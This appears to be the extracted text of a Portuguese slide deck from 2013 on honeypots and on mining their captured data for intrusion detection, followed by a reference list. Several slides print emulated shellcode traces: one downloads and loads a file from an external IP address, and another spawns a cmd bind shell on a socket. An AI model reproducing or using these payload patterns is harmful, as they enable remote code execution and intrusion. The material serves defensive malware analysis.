  • 7. 7Setembro / 2013phmatheus@msn.com • Dionaea É uma evolução do Nepentes com suporte a IPV6 e um novo meio de se ampliar a base de conhecimento que anteriormente era escrita em c++ agora é escrita em python possibilitando que uma gama maior de programadores criem e expandam a base de conhecimento conforme suas necessidades. Média Interatividade • Nepenthes Nepenthes emula as vulnerabilidades para a coleta de informações sobre potenciais ataques é utilizado uma base de conhecimento sobre as falhas para interagir com os atacantes, com o objetivo de obter o artefato malicioso.
  • 8. 8Setembro / 2013phmatheus@msn.com • Kippo – Honeypot que simula o serviço de ssh, coletando informações de ataques de brute-force, e posteriormente os comandos enviados pelo atacante. https://code.google.com/p/kippo/ Média Interatividade
  • 9. 9Setembro / 2013phmatheus@msn.com • Qebek – Modificação do QEMU para monitorar todas as chamadas de sistema do Windows, permitindo analisar, depurar e monitorar a execução de ataques e de artefatos maliciosos. • Sebek – É um modulo do kernel instalado no Windows com o proposito de coletar informações sobre os artefatos maliciosos e os ataques contra os sistemas, ele permite a coleta de informações desde as teclas pressionadas até informações criptografadas. Alta Interatividade
  • 10. 10Setembro / 2013phmatheus@msn.com O Fluxo de um ataque Atacante Honeypot File System Base de Dados Binarios BitStream Sniffer
  • 11. 11Setembro / 2013phmatheus@msn.com • Uso dos dados de rede bruto para extração de informações • Estatística (Cukier et al. 2006) • Associação (Ohrui et al. 2010) • Agrupamento (Ghourabi et al. 2010) • Correlação com SVM (Song et al. 2011) • Longest Common Substring (Thakar et al. 2005) • Redes Neurais MLP e KNN (Grégio et al. 2007) Extração de informação de Honeypots
  • 12. 12Setembro / 2013phmatheus@msn.com • O que todos esses trabalhos trazem em comum é que utilizam os dados de rede para gerar as estatísticas, para efetuar o agrupamento, para criar as assinaturas e os padrões dos detectores de intrusão. Extração de informação de Honeypots
  • 13. 13Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? Base de Dados
  • 14. 14Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? Binarios
  • 15. 15Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? BitStream
  • 16. 16Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? [ { "call": "LoadLibraryA", "args" : [ "urlmon" ], "return" : "0x7df20000" }, { "call": "URLDownloadToFile", "args" : [ "", "http://189.29.132.79:6402/dkqc", "x.", "0", "0" ], "return": "0" }, { "call": "LoadLibraryA", "args" : [ "x." ], "return" : "0x00000000" }, { "call": "ExitThread", "args" : [ "0" ], "return": "0" } ]
  • 17. 17Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? [ { "call": "GetProcAddress", "args" : [ "", "CreateProcessA" ], "return" : "0x7c802367" }, { "call": "GetProcAddress", "args" : [ "", "ExitThread" ], "return" : "0x7c80c058" }, { "call": "GetProcAddress", "args" : [ "", "LoadLibraryA" ], "return" : "0x7c801d77" }, { "call": "LoadLibraryA", "args" : [ "ws2_32" ], "return" : "0x71a10000" },
  • 18. 18Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "GetProcAddress", "args" : [ "", "WSASocketA" ], "return" : "0x71a18769" }, { "call": "GetProcAddress", "args" : [ "", "bind" ], "return" : "0x71a13e00" }, { "call": "GetProcAddress", "args" : [ "", "listen" ], "return" : "0x71a188d3" }, { "call": "GetProcAddress", "args" : [ "", "accept" ], "return" : "0x71a21028" },
  • 19. 19Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "GetProcAddress", "args" : [ "", "closesocket" ], "return" : "0x71a19639" }, { "call": "WSASocket", "args" : [ "2", "1", "0", "0", "0", "0" ], "return": "66" }, { "call": "bind", "args" : [ "66", { "sin_family" : "2", "sin_port" : "12045", "sin_addr" : { "s_addr" : "0.0.0.0" }, "sin_zero" : " " }, "16" ], "return": "0" },
  • 20. 20Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "listen", "args" : [ "66", "1" ], "return": "0" }, { "call": "accept", "args" : [ "66", { }, "" ], "return": "68" }, { "call": "CreateProcess", "args" : "", "cmd", "", "","1","0", "", "", { "cb" : "0", "lpReserved" : "0", "lpDesktop" : "0", "lpTitle" : "0", "dwX" : "0", "dwY" : "0", "dwXSize" : "0", "dwYSize" : "0", "dwXCountChars" : "0", "dwYCountChars" : "0", "dwFillAttribute" : "0", "dwFlags" : "0", "wShowWindow" : "0", "cbReserved2" : "0", "lpReserved2" : "0", "hStdInput" : "68", "hStdOutput" : "68", "hStdError" : "68" },
  • 21. 21Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "hProcess" : "4711", "hThread" : "4712", "dwProcessId" : "4712", "dwThreadId" : "4714" } ], "return": "-1" }, { "call": "closesocket", "args" : [ "68" ], "return": "0" }, { "call": "closesocket", "args" : [ "66" ], "return": "0" }, { "call": "ExitThread", "args" : [ "0" ], "return": "0" } ]
  • 23. 23Setembro / 2013phmatheus@msn.com • M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on, 2006, pp. 383–392. • M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th International Conference on, 2010, pp. 541–545. • X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on, 2010, pp. 435–439. • A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,” in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010, pp. 1–6. • J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011. • U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection patterns & signatures using honeypot,” in Proceedings of the Second International Conference on Innovations in Information Technology, 2005. • A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network activity classification using honeypots data,” in Defense and Security Symposium. International Society for Optics and Photonics, 2007, pp. 657 006–657 006. • S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em: http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf Referências